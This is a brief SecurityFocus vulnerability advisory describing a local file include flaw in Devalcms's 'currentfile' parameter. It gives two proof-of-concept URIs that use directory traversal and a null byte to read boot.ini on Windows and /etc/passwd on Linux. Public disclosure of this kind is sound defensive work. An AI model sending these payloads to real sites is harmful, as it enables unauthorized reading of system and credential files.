Devalcms 'currentfile' Parameter Local File Include Vulnerability

The following proof-of-concept URIs are available:

Windows - http://www.example.com/index.php?currentpath=..&currentfile=.../...//./.....//./.....//boot.ini%00

Linux - http://www.example.com/index.php?currentpath=..&currentfile=.../...//./.....//./.....//etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus